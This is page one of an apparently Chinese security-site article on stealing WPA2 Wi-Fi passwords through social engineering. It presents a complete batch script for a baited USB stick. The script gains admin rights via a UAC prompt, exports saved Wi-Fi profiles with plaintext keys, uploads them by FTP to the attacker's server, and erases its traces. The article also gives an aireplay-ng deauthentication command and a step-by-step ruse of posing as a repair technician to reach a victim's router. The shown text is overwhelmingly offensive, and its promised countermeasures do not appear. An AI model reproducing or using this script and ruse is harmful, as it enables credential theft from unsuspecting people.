欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

常见社工破解WPA2密码方法及防范措施

来源:本站整理 作者:佚名 时间:2018-06-08 TAG: 我要投稿

何为社工?社工是一种通过利用受害者心理弱点,如本能反应、好奇心、同情心、信任、贪婪等进行诸如欺骗、盗取、控制等非法手段的一种攻击方式。在无线安全中也可以利用社工做到许多非法操作。下面举几个利用社工盗取wpa2密码的例子:
0×01 移动存储攻击
某宝小容量u盘,在u盘中存放一个bat批处理文件,并命名为诱使人点开的标题,如:windows电脑优化、私人照片等等。其实bat文件的内容是这个:
@echo off
>nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system"
if '%errorlevel%' NEQ '0' (
goto UACPrompt
) else ( goto gotAdmin )
:UACPrompt
echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs"
echo UAC.ShellExecute "%~s0", "", "", "runas", 1 >> "%temp%\getadmin.vbs"
"%temp%\getadmin.vbs"
exit /B
:gotAdmin
if exist "%temp%\getadmin.vbs" ( del "%temp%\getadmin.vbs" )
md c:\win
netsh wlan export profile key=clear folder=c:\win
echo open 服务器ip>C:\config.txt
echo user 账号>>C:\config.txt
echo 密码>>C:\config.txt
echo mput c:\win\*.xml>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo bye>>C:\config.txt
ftp -n -s:"C:\config.txt"
del C:\config.txt
del C:\win\*.xml
del %0
这个bat脚本会读取本机连接过的wifi信息(包括密码)打包到一个文件夹里并全部put到服务器上,然后删除痕迹和自身防止服务器信息泄露。最后攻击者就可以在自己的ftp服务器里挑选自己中意的wifi了。
攻击演示:
打开此脚本

弹出cmd界面,1秒后消失(太快了不好截),bat脚本也随之消失
查看ftp服务器

wifi信息已经put上来了
进入服务器打开一个xml文件

就拿到了密码
可以自己在里面添加功能使社工效果更好,例如脚本名称命名为某某公司有奖问卷调查,并添加打开调查问卷的命令,使攻击神不知鬼不觉。
若攻击者将脚本拷入多个U盘后广泛撒网,就可以获得该城市的大量wifi信息,影响极大。
0×02 直接接触受害者
1.使用Deauthentication攻击
aireplay-ng –deauth 10000 -a xx:xx:xx:xx:xx:xx -c xx:xx:xx:xx:xx:xx mon0
在下班休息的时候(这个时候普遍在使用网络)对受害者使用断网攻击,等一小时后去敲门,询问网络是否故障,询问网络是哪家公司配置的,然后声称自己的网络也故障了,是一样的公司,然后询问报修电话并拨打,其实拨打的是其他人或根本没有拨打,然后假装是保修人员提示让自己重启路由器,攻击者就可以接触到受害者路由器,运气好的话路由器背面有pin码,就可以撤退了。如果没有,攻击者就进一步施压,假装被保修人员提示打开路由器管理界面在管理界面重启路由器,乘机看到密码。重启完毕后手机ssh连接kali停止攻击,造成重启成功修复网络的假象,然后撤退。

[1] [2]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载